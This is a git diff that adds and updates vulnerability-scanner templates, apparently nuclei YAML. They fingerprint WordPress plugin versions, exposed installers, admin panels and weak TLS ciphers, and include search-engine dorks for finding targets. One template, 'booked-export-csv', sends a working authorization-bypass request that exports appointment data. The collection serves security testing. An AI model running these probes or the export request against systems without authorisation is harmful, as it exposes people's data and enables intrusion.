"TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or diff --git a/poc/other/advanced-backgrounds.yaml b/poc/other/advanced-backgrounds.yaml new file mode 100644 index 0000000000..1885e02889 --- /dev/null +++ b/poc/other/advanced-backgrounds.yaml @@ -0,0 +1,59 @@ +id: advanced-backgrounds + +info: + name: > + Advanced WordPress Backgrounds <= 1.12.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via imageTag Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78e49869-5e7e-45f2-8239-4df18b28db53?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/advanced-backgrounds/" + google-query: inurl:"/wp-content/plugins/advanced-backgrounds/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,advanced-backgrounds,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-backgrounds/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-backgrounds" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.12.3') \ No newline at end of file diff --git a/poc/other/alma-installer.yaml b/poc/other/alma-installer.yaml index 11d2bcece3..e2d134ba86 100644 --- a/poc/other/alma-installer.yaml +++ b/poc/other/alma-installer.yaml @@ -4,6 +4,7 @@ info: name: Alma Installation Exposure author: DhiyaneshDK severity: high + description: Alma is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -30,5 +31,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100db9fc8c36fee3f8f7feae1bd48eecbb442aa85813ad2eba1662ebb9daf8eabfe02210098764b8c24aa179075af150cd9062a2ba551c92c087facfbd5f57e97f153e1de:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c6250654d85fbaf80fbfeb1011ad7902c233e811ca4b2ecd51079239fd1d4998022100f44bc592a98719ffc09c63d53bbc99ce6798630a5618ca1693cf6aa6fda70b84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f.yaml b/poc/other/amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f.yaml new file mode 100644 index 0000000000..0453cbbfc0 --- /dev/null +++ b/poc/other/amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f.yaml @@ -0,0 +1,59 @@ +id: amcharts-charts-and-maps-4b370fcafcc0619a561d13639d3f142f + +info: + name: > + amCharts: Charts and Maps <= 1.4.4 - Reflected Cross-Site Scripting via Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3593e8-3840-4db0-8269-61bbcb50d569?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/amcharts-charts-and-maps/" + google-query: inurl:"/wp-content/plugins/amcharts-charts-and-maps/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,amcharts-charts-and-maps,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/amcharts-charts-and-maps/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "amcharts-charts-and-maps" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/other/bitrix24-installer.yaml b/poc/other/bitrix24-installer.yaml index 41e6479438..2c3830eaa3 100644 --- a/poc/other/bitrix24-installer.yaml +++ b/poc/other/bitrix24-installer.yaml @@ -4,6 +4,7 @@ info: name: Bitrix24 Installation Exposure author: DhiyaneshDK severity: high + description: Bitrix24 is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -32,5 +33,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ce1befacf1d264da511b1b9fe5d9a16de9dae0f6781e61fdc49627f6a301e32d022100b2690f631e5c1e902bf77cceb1da7fbac7fd00596d01b225b1b30111dfc1bf72:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210091ee1386f473f7e0a8e534f84272c12cc950892a3524ab4bd88ba7b1343109db02206aa8ba2c3174fb8688acb3860aa67aba0c259635e2e1725512694e96f6f2640a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/booked-export-csv.yaml b/poc/other/booked-export-csv.yaml new file mode 100644 index 0000000000..4bcd32f37c --- /dev/null +++ b/poc/other/booked-export-csv.yaml @@ -0,0 +1,50 @@ +id: booked-export-csv + +info: + name: Booked < 2.2.6 - Broken Authentication + author: random-robbie + severity: high + description: | + The Booked plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions hooked via AJAX actions in versions up to, and including, 2.2.5. This makes it possible for authenticated attackers with subscriber-level permissions and above to execute several unauthorized actions. + remediation: Fixed in version 2.2.6 + reference: + - https://codecanyon.net/item/booked-appointments-appointment-booking-for-wordpress/9466968 + - http://boxyupdates.com/changelog.php?p=booked + - https://wpscan.com/vulnerability/10107 + metadata: + verified: true + max-request: 1 + fofa-query: "wp-content/plugins/booked/" + publicwww-query: "/wp-content/plugins/booked/" + google-query: inurl:"/wp-content/plugins/booked/" + tags: wordpress,wpscan,wp-plugin,wp,booked,bypass + +http: + - raw: + - | + POST /wp-admin/admin-post.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + booked_export_appointments_csv= + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "End Time" + - "Start Time" + - "Calendar" + condition: and + + - type: word + part: header + words: + - text/csv + + - type: status + status: + - 200 + +# digest: 490a0046304402200db5cb115b1bff83639450515ea6bf1a039f02fba337ac6d20ba4c2e9a0795f602200d97f3b9ea9d40eeec6b70cdc4d8f68747265ebc83fbc650f251b1ee75bb5e0f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/caldera-c2.yaml b/poc/other/caldera-c2.yaml new file mode 100644 index 0000000000..a3350a28c7 --- /dev/null +++ b/poc/other/caldera-c2.yaml @@ -0,0 +1,33 @@ +id: caldera-c2 + +info: + name: Caldera C2 - Detect + author: pussycat0x + severity: info + description: | + MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response. + reference: + - https://github.com/mitre/caldera + - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py + metadata: + verified: true + max-request: 1 + fofa-query: http.favicon.hash:-636718605 + tags: c2,ir,osint,caldera,panel + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Login | CALDERA' + + - type: status + status: + - 200 +# digest: 4a0a004730450221008ff94687ae1b013643001b71a2043b8bb5aba89b88023d073e9bf9d2378b2dc402202bdb2ed3c0f17da110f0afeecbb6388d8938446c7503c7b8e104cbbd103276bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/chamilo-installer.yaml b/poc/other/chamilo-installer.yaml index 6f29ac9c3e..1dc8b4824e 100644 --- a/poc/other/chamilo-installer.yaml +++ b/poc/other/chamilo-installer.yaml @@ -4,9 +4,10 @@ info: name: Chamilo Installer Exposure author: DhiyaneshDk severity: high + description: Chamilo is susceptible to the Installation page exposure due to misconfiguration. metadata: - max-request: 1 verified: true + max-request: 2 shodan-query: title:"Chamilo has not been installed" tags: misconfig,chamilo,install,exposure @@ -30,4 +31,4 @@ http: part: body words: - 'Chamilo has not been installed' -# digest: 4b0a00483046022100a53b0ce0460b87667eafa46dce3a5a8e407ebd606fb6cfed279e8ac9cf3a8787022100b5a5b3c4f4b75c06aaa24c492e112052e3818288d55952b903cc2a5b02914b21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b0756c019bb7b1abbd48a0dc259ed7353203f0f8b43c1ab9ea2c23e06c47cc4022076c08eb4ab70f68d187c606b7148288a27ee88f825dd94d9a6133bdca0eda950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/clipbucket-installer.yaml b/poc/other/clipbucket-installer.yaml index 00862cc822..af7d768794 100644 --- a/poc/other/clipbucket-installer.yaml +++ b/poc/other/clipbucket-installer.yaml @@ -4,6 +4,7 @@ info: name: ClipBucket Installer - Exposure author: DhiyaneshDk severity: high + description: ClipBucket is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -26,5 +27,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022020fdefd08d848f7757e6557588d6124d8c53afc4ce5f92049a6b9ebdbc05853c02203fc0d5b1a38fa0f122f92e3d3e4c20a1c2941894ca3116fabce5c2b5f03f12cc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b0232e0f9d6cc10a6b6b81af15074c2d3071badba75eb623cd7395ab80c7a0f9022011fb63fbd16492a3889ae16290c0d8af40631603dfecb07a53490e3283c38142:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/codeigniter-errorpage.yaml b/poc/other/codeigniter-errorpage.yaml index 915e44a142..3e4d270040 100644 --- a/poc/other/codeigniter-errorpage.yaml +++ b/poc/other/codeigniter-errorpage.yaml @@ -4,6 +4,7 @@ info: name: CodeIgniter - Error Page author: j4vaovo severity: low + description: CodeIgniter error debug are enabled. metadata: verified: true max-request: 1 @@ -37,5 +38,4 @@ http: - 200 - 500 condition: or - -# digest: 4b0a004830460221009601e0b69fb4639e782d38dffe847bddf18dedca5b16925de09f6073af1bf754022100eb48a48d251da19fafead615d7238648332068ee9f6264a6164b283d67350d4a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e319bcb75ac516a3b64842cee0c3a3a33f986ea077cfe62f49c0696041a6108202203874da1c083c996fb5fce8ab458fee421bf5b1d2c9dbe7646e06cd167c873c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/combodo-itop-installer.yaml b/poc/other/combodo-itop-installer.yaml index d3cb9791f7..b0fab335b5 100644 --- a/poc/other/combodo-itop-installer.yaml +++ b/poc/other/combodo-itop-installer.yaml @@ -4,6 +4,7 @@ info: name: Combodo iTop Installer/Upgrade - Exposure author: DhiyaneshDK severity: high + description: Combodo iTop is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.itophub.io/wiki/page?id=2_4_0:install:install_wizard metadata: @@ -32,5 +33,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201f30eff620f897e6028a7996db575d975c409c6c2e420e6bf3d2f254d3bef043022100ca3f0eb24496087bf109d1bdb90f98bca76117e53b6c8fccd0791cac81d5702f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220471fdc699623440130dd74256b7869b21664828661f159a94535029f6c2c2e45022100da8b7c1e8bef0e17c904d5fa71cc374b4d1d05bcc995195d8f13adc7a1ace2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/connectwise-setup.yaml b/poc/other/connectwise-setup.yaml new file mode 100644 index 0000000000..129746b046 --- /dev/null +++ b/poc/other/connectwise-setup.yaml @@ -0,0 +1,30 @@ +id: connectwise-setup + +info: + name: ConnectWise Setup Wizard - Exposure + author: DhiyaneshDk + severity: high + metadata: + verified: true + max-request: 1 + shodan-query: html:"ContentPanel SetupWizard" + tags: misconfig,exposure,install,connectwise + +http: + - method: GET + path: + - "{{BaseURL}}/SetupWizard.aspx" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SetupWizardPage" + - "ContentPanel SetupWizard" + condition: and + + - type: status + status: + - 200 +# digest: 490a0046304402202f47dad19f8e02b2a0a8d30cfa4725100d87c0107b17e79cf622c0d626d5b4020220046f1b19eb9b4ff547894be2403d51c958c338c32a68cb56218b22edca0eea79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/discuz-panel.yaml b/poc/other/discuz-panel.yaml new file mode 100644 index 0000000000..545c74434d --- /dev/null +++ b/poc/other/discuz-panel.yaml @@ -0,0 +1,39 @@ +id: discuz-panel + +info: + name: Discuz Panel - Detection + author: ritikchaddha + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"Discuz!" + fofa-query: title="Discuz!" + tags: panel,discuz,detect,login + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'discuz_uid =' + - 'discuz' + - 'Powered by Discuz!' + - 'content="Discuz' + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'X([0-9.]+)<\/em><\/p>' + +# digest: 4a0a00473045022100bcff81bd751709da945472bca8a9df1d788b837e2135b3a29d2920f5ce042bfd0220642a1af2f14b51f9e68a337b7f18aeaeb8937e4b0b190e224f11d779eebae311:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/dokuwiki-panel.yaml b/poc/other/dokuwiki-panel.yaml index 67610dfb38..0d5fc93c02 100644 --- a/poc/other/dokuwiki-panel.yaml +++ b/poc/other/dokuwiki-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.dokuwiki.org/dokuwiki metadata: + verified: true max-request: 1 shodan-query: http.html:"/dokuwiki/" - verified: true tags: panel,dokuwiki,login http: @@ -25,4 +25,4 @@ http: - 'status_code == 200' - 'contains_any(body, "dokuwiki__header", "content=\"DokuWiki", "/dokuwiki/")' condition: and -# digest: 4a0a0047304502205cf03bfe13c982579e2351db963145e343a76c28ffb173d4d42d464a123b658f022100c98770a8909d655ab6cc1a4ba8bcda6d998d0309715c6d932122ec77151e2c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aff86cc1eb14071fcfd62300de3fa1cdf2c42d74319a041e13b80860464bc40f022100b37d25c57207961c4f415d0f14574c20ec45c7a118bacf8db238604e21d3348b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/dolphin-installer.yaml b/poc/other/dolphin-installer.yaml index 5426cd872d..cb8b23f40f 100644 --- a/poc/other/dolphin-installer.yaml +++ b/poc/other/dolphin-installer.yaml @@ -4,6 +4,7 @@ info: name: Dolphin Installer - Exposure author: DhiyaneshDk severity: high + description: Dolphin is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -25,5 +26,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201b70fd1954e7251511534d89cc5913f5d6d5d30604ab6fd420a23bd2993440e8022004e5b319ec9b365bbefa4a910dc8e3ed2f64070fb069011c01bfb9baa7fca623:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207e6b2fd88a257051a5608fae50cd2753b42cbcd9ade619801f1dd865ffcd4524022100ba02eaf7a87dd285bcebb9db846e46e7302c328948a8cc7b01e839447d1be726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/espocrm-installer.yaml b/poc/other/espocrm-installer.yaml new file mode 100644 index 0000000000..520106d974 --- /dev/null +++ b/poc/other/espocrm-installer.yaml @@ -0,0 +1,29 @@ +id: espocrm-installer + +info: + name: Espocrm Installer + author: DhiyaneshDk + severity: high + description: Espocrm is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Welcome to Espocrm" + tags: misconfig,espocrm,install,exposure + +http: + - method: GET + path: + - '{{BaseURL}}/install/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'EspoCRM Installation' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100f6cf7cdc4e68510f8c1a4808b7e9ec263a30317d83437a3a888ca011977d2880022100801f7ad77b0ef1835e6329d6f4db0c8e5912c4fce349a5c142feb2cb7584e8b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/graylog-panel.yaml b/poc/other/graylog-panel.yaml new file mode 100644 index 0000000000..26860e57d7 --- /dev/null +++ b/poc/other/graylog-panel.yaml @@ -0,0 +1,28 @@ +id: graylog-panel + +info: + name: Graylog Login Panel - Detect + author: righettod + severity: info + description: | + Graylog login panel was detected. + reference: + - https://graylog.org/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Graylog Web Interface" + tags: panel,graylog,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "<title>Graylog Web Interface")' + condition: and +# digest: 4a0a004730450220483d594c8f2e00d484412209f6f879a9eed6a4ea1a0cdf4ccbbefd5f1333a76e022100b87e837f94f7fa68d8e54cfe42abec642be4ce61c478a24b22b97ae49c13f514:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/h2o-dashboard.yaml b/poc/other/h2o-dashboard.yaml new file mode 100644 index 0000000000..d991cdcedb --- /dev/null +++ b/poc/other/h2o-dashboard.yaml @@ -0,0 +1,39 @@ +id: h2o-dashboard + +info: + name: H2O Dashboard - Exposure + author: byt3bl33d3r + severity: high + description: | + H2o dashboard by default has no authentication and can lead to RCE on the host. + metadata: + verified: true + max-request: 1 + shodan-query: title:"H2O Flow" + tags: misconfig,exposure,h2o,ml,unauth + +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: header + words: + - "X-H2o-Build-Project-Version" + - "X-H2o-Cluster-Id" + condition: and + + - type: word + part: body + words: + - "H2O Flow" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100ee21c15fb3a2cb2198efd560f30f90f725fd4eb8ab56e8e0cca48143e5f8fb0602210094e9651f477ea39f953e7175ce6b94649516d10db3a2484797638c4dabc8bbed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/knowledgetree-installer.yaml b/poc/other/knowledgetree-installer.yaml new file mode 100644 index 0000000000..dd9ec1e510 --- /dev/null +++ b/poc/other/knowledgetree-installer.yaml @@ -0,0 +1,29 @@ +id: knowledgetree-installer + +info: + name: KnowledgeTree Installer Exposure + author: ritikchaddha + severity: high + description: KnowledgeTree is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: title:"KnowledgeTree Installer" + tags: misconfig,knowledgetree,install,exposure + +http: + - method: GET + path: + - '{{BaseURL}}/setup/wizard/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>KnowledgeTree Installer' + + - type: status + status: + - 200 +# digest: 4a0a00473045022100e2f1ec120a28b166e67a0f55986a6ad132ed10fbbfca68248fd8664467c77b79022026b162ddb6ef3d622c6f373261c0dd625d3af9c967c9c9969cef50dc57960c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/learnpress-5c26a1848cda845d9b97374472d49eb0.yaml b/poc/other/learnpress-5c26a1848cda845d9b97374472d49eb0.yaml new file mode 100644 index 0000000000..6a3969ed97 --- /dev/null +++ b/poc/other/learnpress-5c26a1848cda845d9b97374472d49eb0.yaml @@ -0,0 +1,59 @@ +id: learnpress-5c26a1848cda845d9b97374472d49eb0 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e495507d-7eac-4f38-ab6f-b8f0809b2be4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,learnpress,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.7') \ No newline at end of file diff --git a/poc/other/learnpress-fcb8158f71307795525b9840bda82742.yaml b/poc/other/learnpress-fcb8158f71307795525b9840bda82742.yaml new file mode 100644 index 0000000000..d609c6b06f --- /dev/null +++ b/poc/other/learnpress-fcb8158f71307795525b9840bda82742.yaml @@ -0,0 +1,59 @@ +id: learnpress-fcb8158f71307795525b9840bda82742 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields' + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,learnpress,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.7') \ No newline at end of file diff --git a/poc/other/magnolia-installer.yaml b/poc/other/magnolia-installer.yaml index c15dfdeedf..dd035fb9c6 100644 --- a/poc/other/magnolia-installer.yaml +++ b/poc/other/magnolia-installer.yaml @@ -4,6 +4,7 @@ info: name: Magnolia CMS Installer author: pussycat0x severity: info + description: Magnolia CMS is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.magnolia-cms.com/ metadata: @@ -33,5 +34,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204b45c4522d3518f08393aace7888f02139e968db16df30c31e468d02133b2842022100926da46f247014e67615cfdee51cd5136d561a9c56a2ab5183b8edeace338cf4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202fe501faefe0437f5aaf50ed23236750795391092771f723589390f00fdad505022100b75940b659a50b3d784c666f81cb10925f5b16486e7bfe0848db0315105847b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/mantisbt-installer.yaml b/poc/other/mantisbt-installer.yaml index a0452e518d..8c6527610d 100644 --- a/poc/other/mantisbt-installer.yaml +++ b/poc/other/mantisbt-installer.yaml @@ -4,6 +4,7 @@ info: name: MantisBT Installation Exposure author: DhiyaneshDK severity: high + description: MantisBT is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -30,5 +31,4 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210086de8c62065a4b5ef489f0adc7c40c8587166b8f0523ef822cfb1d3789bfb717022100e45271fa2d10673b8e41c3d6bf1120f24d3a94d90a871dc63200bcce129d9a00:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f03dac0390a5cb48ae9d1386bd16e63bd76795f5a5e14f08d8f097ed500ecb9702210089aa21e8714f6796a62c21441b792faa970441fbac2971677497d68a1f349247:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/mosparo-install.yaml b/poc/other/mosparo-install.yaml index b40145ccb1..efec8d2b91 100644 --- a/poc/other/mosparo-install.yaml +++ b/poc/other/mosparo-install.yaml @@ -4,6 +4,7 @@ info: name: mosparo Exposed Installation author: DhiyaneshDK severity: high + description: mosparo is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -24,5 +25,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201a7f225231563d8f2b7e8a51395f3ba46036a272da17108f3d8a1fc9f4679d2802201aad6546fc1e94e5f142d0858553c2e81d45ddd461945bcff9b9b31ca285d0ed:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220471f0a3247eac57d3ceb5521de7ff051ebbf915f43d2a13d603077a1caabf0c3022040ff4e11fa185170bcac85013249ce0b2ee75cd12758d260584f2209a2d71485:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/orangescrum-install.yaml b/poc/other/orangescrum-install.yaml index 55a24cc375..dc3b40d20f 100644 --- a/poc/other/orangescrum-install.yaml +++ b/poc/other/orangescrum-install.yaml @@ -4,6 +4,7 @@ info: name: Orangescrum Exposed Installation author: ritikchaddha severity: high + description: Orangescrum is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -24,5 +25,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009d02f7c4d64ae6407560f9fca8efc6229037686c81caf8e71986ac3914adcb42022100b2844e3aaa5ee11917491b535c68de6f26fef1544ef4069bcfc1bfad0c285431:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e36721a4892737aa3749b1b9970cf00e6b0605905886136352703c672fa519b5022100e6b2f738351a15d804e3fc3d76f523fba679e89864d5a1cac6c342516cfae12a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/ords-panel.yaml b/poc/other/ords-panel.yaml new file mode 100644 index 0000000000..f071267265 --- /dev/null +++ b/poc/other/ords-panel.yaml @@ -0,0 +1,18 @@ +id: ords-panel + +info: + author: 111xnagashy + name: ords-panel + description: Internal panel accessed publicly + severity: high + tags: information disclosure , leak ,admin panel 